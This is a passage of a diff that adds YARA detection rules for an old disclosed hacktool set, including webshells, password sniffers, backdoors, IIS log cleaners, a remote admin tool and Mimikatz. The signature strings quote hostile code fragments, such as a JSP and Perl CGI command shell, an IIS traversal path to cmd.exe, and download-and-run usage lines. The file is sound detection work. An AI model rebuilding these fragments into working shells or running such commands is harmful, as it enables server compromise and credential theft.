+ $s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+ $s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+ $s15 = "sql=\"select * from scjh\" " fullword ascii
+ condition:
+ all of them
+}
+
+rule QQ_zip_Folder_QQ {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file QQ.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+ strings:
+ $s0 = "EMAIL:haoq@neusoft.com" fullword wide
+ $s1 = "EMAIL:haoq@neusoft.com" fullword wide
+ $s4 = "QQ2000b.exe" fullword wide
+ $s5 = "haoq@neusoft.com" fullword ascii
+ $s9 = "QQ2000b.exe" fullword ascii
+ $s10 = "\\qq2000b.exe" fullword ascii
+ $s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+ $s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule UnPack_rar_Folder_TBack {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+ strings:
+ $s0 = "Redirect SPort RemoteHost RPort -->Port Redirector" fullword ascii
+ $s1 = "http://IP/a.exe a.exe -->Download A File" fullword ascii
+ $s2 = "StopSniffer -->Stop Pass Sniffer" fullword ascii
+ $s3 = "TerminalPort Port -->Set New Terminal Port" fullword ascii
+ $s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+ $s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+ $s7 = "StartSniffer NIC -->Start Sniffer" fullword ascii
+ $s8 = "Shell -->Get A Shell" fullword ascii
+ $s11 = "DeleteService ServiceName -->Delete A Service" fullword ascii
+ $s12 = "Disconnect ThreadNumber|All -->Disconnect Others" fullword ascii
+ $s13 = "Online -->List All Connected IP" fullword ascii
+ $s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+ $s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+ $s18 = "Execute Program -->Execute A Program" fullword ascii
+ $s19 = "Reboot -->Reboot The System" fullword ascii
+ $s20 = "Password Sniffering Is Not Running" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule sig_238_cmd_2 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+ strings:
+ $s0 = "Process child = Runtime.getRuntime().exec(" ascii
+ $s1 = "InputStream in = child.getInputStream();" fullword ascii
+ $s2 = "String cmd = request.getParameter(\"" ascii
+ $s3 = "while ((c = in.read()) != -1) {" fullword ascii
+ $s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+ condition:
+ all of them
+}
+
+rule RangeScan {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+ strings:
+ $s0 = "RangeScan.EXE" fullword wide
+ $s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+ $s9 = "Produced by isn0" fullword ascii
+ $s10 = "RangeScan" fullword wide
+ $s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+ condition:
+ 3 of them
+}
+
+rule XYZCmd_zip_Folder_Readme {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+ strings:
+ $s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+ $s20 = "XYZCmd V1.0" fullword ascii
+ condition:
+ all of them
+}
+
+rule ByPassFireWall_zip_Folder_Inject {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Inject.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+ strings:
+ $s6 = "Fail To Inject" fullword ascii
+ $s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+ $s11 = " Successfully" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_sqlcmd {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 40
+ hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+ strings:
+ $s0 = "Permission denial to EXEC command.:(" fullword ascii
+ $s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+ $s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+ $s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+ $s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+ $s7 = "Http://www.patching.net 2000/12/14" fullword ascii
+ $s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule ASPack_ASPACK {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+ strings:
+ $s0 = "ASPACK.EXE" fullword wide
+ $s5 = "CLOSEDFOLDER" fullword wide
+ $s10 = "ASPack compressor" fullword wide
+ condition:
+ all of them
+}
+
+rule sig_238_2323 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file 2323.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+ strings:
+ $s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+ $s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+ $s3 = "Failed to execute shell" fullword ascii
+ $s5 = "/h - Hide Window" fullword ascii
+ $s7 = "Accepted connection from client at %s" fullword ascii
+ $s9 = "Error %d: %s" fullword ascii
+ condition:
+ all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Install.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "95866e917f699ee74d4735300568640ea1a05afd"
+ strings:
+ $s1 = "http://go.163.com/sdemo" fullword wide
+ $s2 = "Player.tmp" fullword ascii
+ $s3 = "Player.EXE" fullword wide
+ $s4 = "mailto:sdemo@263.net" fullword ascii
+ $s5 = "S-Player.exe" fullword ascii
+ $s9 = "http://www.BaiXue.net (" fullword wide
+ condition:
+ all of them
+}
+
+rule sig_238_TFTPD32 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+ strings:
+ $s0 = " http://arm.533.net" fullword ascii
+ $s1 = "Tftpd32.hlp" fullword ascii
+ $s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+ $s3 = "TFTPD32 -- " fullword wide
+ $s4 = "%d -- %s" fullword ascii
+ $s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+ $s12 = "TftpPort" fullword ascii
+ $s13 = "Ttftpd32BackGround" fullword ascii
+ $s17 = "SOFTWARE\\TFTPD32" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_iecv {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+ strings:
+ $s1 = "Edit The Content Of Cookie " fullword wide
+ $s3 = "Accessories\\wordpad.exe" fullword ascii
+ $s4 = "gorillanation.com" fullword ascii
+ $s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+ $s12 = "http://nirsoft.cjb.net" fullword ascii
+ condition:
+ all of them
+}
+
+rule Antiy_Ports_1_21 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+ strings:
+ $s0 = "AntiyPorts.EXE" fullword wide
+ $s7 = "AntiyPorts MFC Application" fullword wide
+ $s20 = " @Stego:" fullword ascii
+ condition:
+ all of them
+}
+
+rule perlcmd_zip_Folder_cmd {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+ strings:
+ $s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+ $s1 = "s/%20/ /ig;" fullword ascii
+ $s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+ $s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+ $s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+ $s6 = "$execthis = $_;" fullword ascii
+ $s7 = "system($execthis);" fullword ascii
+ $s12 = "s/%2f/\\//ig;" fullword ascii
+ condition:
+ 6 of them
+}
+
+rule aspbackdoor_asp3 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+ strings:
+ $s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+ $s1 = " Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+ $s2 = " value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+ $s14 = " Windows NT " fullword ascii
+ $s16 = " WIndows 2000 " fullword ascii
+ $s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+ $s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+ $s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_FPipe {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+ strings:
+ $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+ $s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+ $s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+ $s3 = " -s - outbound source port number" fullword ascii
+ $s5 = "http://www.foundstone.com" fullword ascii
+ $s20 = "Attempting to connect to %s port %d" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_concon {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file concon.com"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+ strings:
+ $s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspbackdoor_regdll {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+ strings:
+ $s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+ $s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+ $s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+ $s5 = "Public Property Get oFS()" fullword ascii
+ condition:
+ all of them
+}
+
+rule CleanIISLog {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+ strings:
+ $s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+ $s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+ $s8 = "CleanIISLog Ver" fullword ascii
+ $s9 = "msftpsvc" fullword ascii
+ $s10 = "Fatal Error: MFC initialization failed" fullword ascii
+ $s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+ $s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+ $s16 = "Service %s Stopped." fullword ascii
+ $s20 = "Process Log File %s..." fullword ascii
+ condition:
+ 5 of them
+}
+
+rule sqlcheck {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+ strings:
+ $s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+ $s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+ $s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+ $s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+ $s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+ condition:
+ 3 of them
+}
+
+rule sig_238_RunAsEx {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+ strings:
+ $s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+ $s8 = "cmd.bat" fullword ascii
+ $s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+ $s11 = "%s Execute Succussifully." fullword ascii
+ $s12 = "winsta0" fullword ascii
+ $s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule sig_238_nbtdump {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+ strings:
+ $s0 = "Creation of results file - \"%s\" failed." fullword ascii
+ $s1 = "c:\\>nbtdump remote-machine" fullword ascii
+ $s7 = "Cerberus NBTDUMP" fullword ascii
+ $s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+ $s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+ $s19 = "%s's password is %s</H3>" fullword wide
+ $s20 = "%s's password is blank</H3>" fullword wide
+ condition:
+ 5 of them
+}
+
+rule sig_238_Glass2k {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+ strings:
+ $s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+ $s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+ $s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+ $s4 = "Glass2k.exe" fullword wide
+ $s7 = "NeoLite Executable File Compressor" fullword ascii
+ condition:
+ all of them
+}
+
+rule SplitJoin_V1_3_3_rar_Folder_3 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "21409117b536664a913dcd159d6f4d8758f43435"
+ strings:
+ $s2 = "ie686@sohu.com" fullword ascii
+ $s3 = "splitjoin.exe" fullword ascii
+ $s7 = "SplitJoin" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspbackdoor_EDIT {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+ strings:
+ $s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+ $s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+ $s3 = "response.write \"<a href='index.asp'>" fullword ascii
+ $s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+ $s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+ $s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+ $s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule aspbackdoor_entice {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file entice.asp"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+ strings:
+ $s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+ $s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+ $s4 = "conndb.Execute(sqllanguage)" fullword ascii
+ $s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+ $s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+ condition:
+ all of them
+}
+
+rule FPipe2_0 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "891609db7a6787575641154e7aab7757e74d837b"
+ strings:
+ $s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+ $s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+ $s2 = " -s - outbound connection source port number" fullword ascii
+ $s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+ $s4 = "http://www.foundstone.com" fullword ascii
+ $s19 = "FPipe" fullword ascii
+ condition:
+ all of them
+}
+
+rule InstGina {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+ strings:
+ $s0 = "To Open Registry" fullword ascii
+ $s4 = "I love Candy very much!!" ascii
+ $s5 = "GinaDLL" fullword ascii
+ condition:
+ all of them
+}
+
+rule ArtTray_zip_Folder_ArtTray {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+ strings:
+ $s0 = "http://www.brigsoft.com" fullword wide
+ $s2 = "ArtTrayHookDll.dll" fullword ascii
+ $s3 = "ArtTray Version 1.0 " fullword wide
+ $s16 = "TRM_HOOKCALLBACK" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_findoor {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+ strings:
+ $s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+ $s8 = "PASS hacker@hacker.com" fullword ascii
+ $s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+ $s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+ $s11 = "http://isno.yeah.net" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule aspbackdoor_ipclear {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+ strings:
+ $s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+ $s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+ $s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+ $s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+ $s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+ condition:
+ all of them
+}
+
+rule WinEggDropShellFinal_zip_Folder_InjectT {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+ strings:
+ $s0 = "Packed by exe32pack" ascii
+ $s1 = "2TInject.Dll" fullword ascii
+ $s2 = "Windows Services" fullword ascii
+ $s3 = "Findrst6" fullword ascii
+ $s4 = "Press Any Key To Continue......" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_rshsvc {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
+ strings:
+ $s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
+ $s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
+ $s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
+ $s10 = "copy %1\\rshsvc.exe" fullword ascii
+ $s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
+ $s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
+ $s18 = "pushd %SystemRoot%\\system32" fullword ascii
+ condition:
+ all of them
+}
+
+rule gina_zip_Folder_gina {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file gina.dll"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+ strings:
+ $s0 = "NEWGINA.dll" fullword ascii
+ $s1 = "LOADER ERROR" fullword ascii
+ $s3 = "WlxActivateUserShell" fullword ascii
+ $s6 = "WlxWkstaLockedSAS" fullword ascii
+ $s13 = "WlxIsLockOk" fullword ascii
+ $s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+ $s16 = "WlxShutdown" fullword ascii
+ $s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+ condition:
+ all of them
+}
+
+rule superscan3_0 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+ strings:
+ $s0 = "\\scanner.ini" fullword ascii
+ $s1 = "\\scanner.exe" fullword ascii
+ $s2 = "\\scanner.lst" fullword ascii
+ $s4 = "\\hensss.lst" fullword ascii
+ $s5 = "STUB32.EXE" fullword wide
+ $s6 = "STUB.EXE" fullword wide
+ $s8 = "\\ws2check.exe" fullword ascii
+ $s9 = "\\trojans.lst" fullword ascii
+ $s10 = "1996 InstallShield Software Corporation" fullword wide
+ condition:
+ all of them
+}
+
+rule sig_238_xsniff {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+ strings:
+ $s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+ $s3 = "%s - simple sniffer for win2000" fullword ascii
+ $s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+ $s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+ $s7 = "http://www.xfocus.org" fullword ascii
+ $s9 = " -pass : Filter username/password" fullword ascii
+ $s18 = " -udp : Output udp packets" fullword ascii
+ $s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+ $s20 = " -tcp : Output tcp packets" fullword ascii
+ condition:
+ 6 of them
+}
+
+rule sig_238_fscan {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file fscan.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+ strings:
+ $s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+ $s2 = " -n - no port scanning - only pinging (unless you use -q)" fullword ascii
+ $s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+ $s6 = " -z - maximum simultaneous threads to use for scanning" fullword ascii
+ $s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+ $s13 = "http://www.foundstone.com" fullword ascii
+ $s16 = " -p - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+ $s18 = "Bind port number out of range. Using system default." fullword ascii
+ $s19 = "fscan.exe" fullword wide
+ condition:
+ 4 of them
+}
+
+rule _iissample_nesscan_twwwscan {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ super_rule = 1
+ hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+ hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+ hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
+ strings:
+ $s0 = "Connecting HTTP Port - Result: " fullword
+ $s1 = "No space for command line argument vector" fullword
+ $s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+ $s5 = "No space for copy of command line" fullword
+ $s7 = "- Windows NT,2000 Patch Method - " fullword
+ $s8 = "scanf : floating point formats not linked" fullword
+ $s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+ $s13 = "!\"what?\"" fullword
+ $s14 = "%s Port %d Closed" fullword
+ $s16 = "printf : floating point formats not linked" fullword
+ $s17 = "xxtype.cpp" fullword
+ condition:
+ all of them
+}
+
+rule _FsHttp_FsPop_FsSniffer {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ super_rule = 1
+ hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+ hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+ hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
+ strings:
+ $s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+ $s1 = "-ERR Get SMS Users ID Failed" fullword
+ $s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+ $s3 = "-ERR Post SMS Failed" fullword
+ $s4 = "Current.hlt" fullword
+ $s6 = "Histroy.hlt" fullword
+ $s7 = "-ERR Send SMS Failed" fullword
+ $s12 = "-ERR Change Password <New Password>" fullword
+ $s17 = "+OK Send SMS Succussifully" fullword
+ $s18 = "+OK Set New Password: [%s]" fullword
+ $s19 = "CHANGE PASSWORD" fullword
+ condition:
+ all of them
+}
+
+rule Ammyy_Admin_AA_v3 {
+ meta:
+ description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
+ author = "Florian Roth"
+ reference = "http://goo.gl/gkAg2E"
+ date = "2014/12/22"
+ score = 55
+ hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+ hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
+ strings:
+ $x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+ $x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+ $x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+ $x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+ $x5 = "Please enter password for accessing remote computer" fullword ascii
+
+ $s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+ $s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+ $s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+ $s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+ condition:
+ 2 of ($x*) or all of ($s*)
+}
+
+/* Other dumper and custom hack tools */
+
+rule Mimikatz_Samples_2014b_1 {
+ meta:
+ description = "Mimikatz pwassword dumper samples from the second half of 2014"
+ author = "Florian Roth with the help of YarGen Rule Generator"
+ reference = "not set"
+ date = "2014/12/23"
+ score = 80
+ hash = "ef5bd09b2e5836b58a8b27c1fb3650621aaf6488"
+ strings:
+ $s1 = "Raw command (not implemented yet) : %s" fullword wide
+ $s3 = " ! ZwSetInformationProcess 0x%08x for %u/%-14S" fullword wide
+ $s6 = "PsSetCreateProcessNotifyRoutineEx" fullword wide
+ $s10 = "\\Device\\mimidrv" fullword wide
+ $s16 = "\\DosDevices\\mimidrv" fullword wide
+ $s17 = "All privileges for the access token from %u/%-14S" fullword wide
+ $s20 = "in (0x%p - %u) ; out (0x%p - %u)" fullword wide
+ condition:
+ all of them
+}
+
+rule Mimikatz_Samples_2014b_2 {
+ meta:
+ description = "Mimikatz pwassword dumper samples from the second half of 2014"
+ author = "Florian Roth with the help of YarGen Rule Generator"
+ reference = "not set"
+ date = "2014/12/23"
+ score = 80
+ hash = "98033f5bbdd79b12a7804bad0698c91e6d5067ad"
+ strings:
+ $s0 = "0: kd> .process /r /p <EPROCESS address>" fullword ascii
